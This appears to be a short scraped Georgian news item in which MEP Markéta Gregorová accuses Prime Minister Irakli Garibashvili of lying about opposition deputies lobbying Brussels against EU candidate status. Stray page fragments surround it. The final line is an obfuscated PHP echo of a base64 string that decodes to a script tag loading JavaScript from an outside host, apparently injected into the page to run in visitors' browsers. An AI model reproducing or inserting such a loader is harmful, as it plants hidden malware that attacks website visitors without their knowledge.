celsiusi
ავერსი შნაიდერი
ევროპარლამენტარი მარკეტა გრეგოროვა, ოპოზიციონერ დეპუტატ სალომე სამადაშვილთან დაკავშირებით საქართველოს პრემიერმინისტრის განცხადებას ეხმაურება.
 
გრეგოროვას თქმით,  ირაკლი ღარიბაშვილი იტყუება, როცა ამბობს, რომ ოპოზიციონერი დეპუტატები ბრიუსელში დადიოდნენ და ითხოვდნენ, არ მიენიჭებინათ საქართველოსთვის კანდიდატის სტატუსი.
 
 "ბრიუსელში იყავით? მე ვერ გნახეთ, თუმცა შეხვედრები მქონდა ოპოზიციასთან და თითოეული მათგანი თითქმის გვეხვეწებოდა კანდიდატის სტატუსის მინიჭებას, ამიტომ ნუ იტყუებით. ჩამოდით ბრიუსელში და შეგვიძლია ვილაპარაკოთ. ნუ იქნებით პრობლემა, იყავით გამოსავალი", - წერს მარკეტა გრეგოროვა.
586
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");